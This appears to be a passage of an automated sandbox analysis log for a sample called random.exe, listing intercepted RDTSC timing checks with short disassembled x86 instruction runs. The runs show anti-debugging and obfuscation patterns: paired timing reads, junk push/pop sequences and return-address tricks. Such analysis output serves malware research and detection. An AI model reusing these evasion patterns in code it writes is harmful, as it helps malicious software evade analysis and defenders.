Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE7683 second address: FE769C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4C44C2BE26h 0x00000008 js 00007F4C44C2BE26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 jnp 00007F4C44C2BE26h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFABF0 second address: FFABF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFABF8 second address: FFAC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4C44C2BE34h 0x0000000a jmp 00007F4C44C2BE35h 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F4C44C2BE26h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFAC2E second address: FFAC5B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4C45470A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F4C45470A80h 0x00000011 push edi 0x00000012 jmp 00007F4C45470A7Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFE900 second address: FFE91A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C44C2BE36h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFE91A second address: FFE95F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4C45470A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F4C45470A78h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D3A40h], eax 0x0000002f push 00000000h 0x00000031 mov dword ptr [ebp+122D1888h], ecx 0x00000037 push 796E8F02h 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFE95F second address: FFE963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFE963 second address: FFE981 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFE981 second address: FFEA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 xor dword ptr [esp], 796E8F82h 0x0000000d add dword ptr [ebp+122D1A3Fh], esi 0x00000013 push 00000003h 0x00000015 and edi, dword ptr [ebp+122D2A9Bh] 0x0000001b push 00000000h 0x0000001d mov edi, dword ptr [ebp+122D2ABBh] 0x00000023 jnl 00007F4C44C2BE42h 0x00000029 push 00000003h 0x0000002b mov si, ax 0x0000002e push DB92B47Ah 0x00000033 jmp 00007F4C44C2BE37h 0x00000038 xor dword ptr [esp], 1B92B47Ah 0x0000003f mov esi, 5ED73529h 0x00000044 lea ebx, dword ptr [ebp+1245F81Fh] 0x0000004a cmc 0x0000004b xchg eax, ebx 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f push ebx 0x00000050 pop ebx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFEB03 second address: FFEB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F4C45470A8Eh 0x00000015 jmp 00007F4C45470A88h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFEB30 second address: FFEB41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C44C2BE2Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFEB41 second address: FFEB7E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4C45470A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 js 00007F4C45470A7Eh 0x00000016 jns 00007F4C45470A78h 0x0000001c mov eax, dword ptr [eax] 0x0000001e push edi 0x0000001f jmp 00007F4C45470A7Dh 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 js 00007F4C45470A84h 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFEB7E second address: FFEB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFEB82 second address: FFEBBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov ch, bh 0x00000009 push 00000003h 0x0000000b jmp 00007F4C45470A86h 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D1B8Ch], edx 0x00000018 push 00000003h 0x0000001a add dx, B6FEh 0x0000001f push 65F1E3FFh 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 pop eax 0x0000002a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFEBBD second address: FFEBC3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFED18 second address: FFED1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FFED1E second address: FFEDB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 xor dword ptr [esp], 4B430E72h 0x0000000d mov edx, dword ptr [ebp+122D3347h] 0x00000013 push 00000003h 0x00000015 sub edx, 55098AB1h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007F4C44C2BE28h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 00000019h 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 mov dword ptr [ebp+122D3A08h], ebx 0x0000003d push 00000003h 0x0000003f sub edi, 60689B98h 0x00000045 push AD70B887h 0x0000004a pushad 0x0000004b js 00007F4C44C2BE28h 0x00000051 jl 00007F4C44C2BE2Ch 0x00000057 popad 0x00000058 xor dword ptr [esp], 6D70B887h 0x0000005f mov ecx, dword ptr [ebp+122D2BD7h] 0x00000065 lea ebx, dword ptr [ebp+1245F833h] 0x0000006b jg 00007F4C44C2BE2Ah 0x00000071 mov cx, 7675h 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007F4C44C2BE2Fh 0x0000007d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1010009 second address: 101000D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101000D second address: 1010013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1010013 second address: 101002A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C45470A83h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF6758 second address: FF676F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F4C44C2BE32h 0x0000000f jno 00007F4C44C2BE26h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF676F second address: FF6779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF6779 second address: FF677D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF677D second address: FF6799 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101DB81 second address: 101DB88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101E112 second address: 101E11A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101E11A second address: 101E11E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101E11E second address: 101E122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101E2BC second address: 101E2C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101E2C1 second address: 101E2C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101E2C7 second address: 101E2D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F4C44C2BE26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101E594 second address: 101E5A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007F4C45470A76h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101E6EA second address: 101E6F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101E6F0 second address: 101E6F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101EA42 second address: 101EA4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4C44C2BE26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101EA4C second address: 101EA78 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4C45470A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b jne 00007F4C45470A9Ch 0x00000011 jmp 00007F4C45470A88h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101EA78 second address: 101EA7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101EBB0 second address: 101EBCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F4C45470A86h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101EBCE second address: 101EBD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101ED5E second address: 101ED76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C45470A84h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101ED76 second address: 101ED82 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101ED82 second address: 101ED8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101ED8E second address: 101ED98 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4C44C2BE26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101EECE second address: 101EED2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101F46E second address: 101F474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101F5C8 second address: 101F5DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F4C45470A76h 0x0000000d jc 00007F4C45470A76h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101F5DC second address: 101F5E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F4C44C2BE26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101F73D second address: 101F752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jne 00007F4C45470A76h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101F752 second address: 101F771 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C44C2BE34h 0x00000007 pushad 0x00000008 jnc 00007F4C44C2BE26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101F771 second address: 101F777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 101F89D second address: 101F8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1022416 second address: 1022423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1022423 second address: 1022427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1022427 second address: 102242D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102242D second address: 1022437 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4C44C2BE2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1022437 second address: 102244E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F4C45470A7Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102C1BC second address: 102C1CE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4C44C2BE2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102C1CE second address: 102C1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102C1D2 second address: 102C1F2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4C44C2BE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F4C44C2BE32h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102C1F2 second address: 102C1F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102C355 second address: 102C36D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C44C2BE34h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102C36D second address: 102C376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102C8C3 second address: 102C8D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C44C2BE2Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102C8D3 second address: 102C8D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102C8D7 second address: 102C8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102C8DD second address: 102C905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F4C45470A7Ch 0x0000000c jnc 00007F4C45470A76h 0x00000012 jmp 00007F4C45470A82h 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102D8EC second address: 102D909 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C44C2BE2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pushad 0x0000000c jno 00007F4C44C2BE28h 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102D909 second address: 102D90D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102D90D second address: 102D942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c pushad 0x0000000d jp 00007F4C44C2BE26h 0x00000013 jl 00007F4C44C2BE26h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4C44C2BE39h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102D942 second address: 102D972 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c jo 00007F4C45470A7Eh 0x00000012 push ebx 0x00000013 jno 00007F4C45470A76h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push ebx 0x0000001f pushad 0x00000020 jnp 00007F4C45470A76h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102D972 second address: 102D9B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F4C44C2BE28h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 movsx edi, si 0x00000024 push AE00AB7Bh 0x00000029 push eax 0x0000002a push edx 0x0000002b jnl 00007F4C44C2BE2Ch 0x00000031 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102E89F second address: 102E8A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102E8A4 second address: 102E8A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102E8A9 second address: 102E8AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102E9EE second address: 102E9F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102EAA3 second address: 102EAA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102EF94 second address: 102EF99 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102EF99 second address: 102EFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 pushad 0x00000009 mov edi, dword ptr [ebp+122D2A7Fh] 0x0000000f mov dword ptr [ebp+122D2685h], edi 0x00000015 popad 0x00000016 push 00000000h 0x00000018 jmp 00007F4C45470A7Ah 0x0000001d push 00000000h 0x0000001f call 00007F4C45470A7Ch 0x00000024 xor di, B8DBh 0x00000029 pop esi 0x0000002a xchg eax, ebx 0x0000002b pushad 0x0000002c pushad 0x0000002d push edi 0x0000002e pop edi 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102EFD6 second address: 102EFDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102EFDE second address: 102EFFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4C45470A76h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f jmp 00007F4C45470A7Ch 0x00000014 pop edi 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F932 second address: 102F937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F7D3 second address: 102F7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F937 second address: 102F9AA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4C44C2BE2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F4C44C2BE30h 0x00000010 nop 0x00000011 mov esi, dword ptr [ebp+122D2B57h] 0x00000017 push 00000000h 0x00000019 mov di, 11BEh 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F4C44C2BE28h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 00000017h 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 or edi, dword ptr [ebp+122D2ACFh] 0x0000003f xchg eax, ebx 0x00000040 jmp 00007F4C44C2BE37h 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F7D8 second address: 102F7DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102F9AA second address: 102F9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1030A1D second address: 1030A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1030A22 second address: 1030A27 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
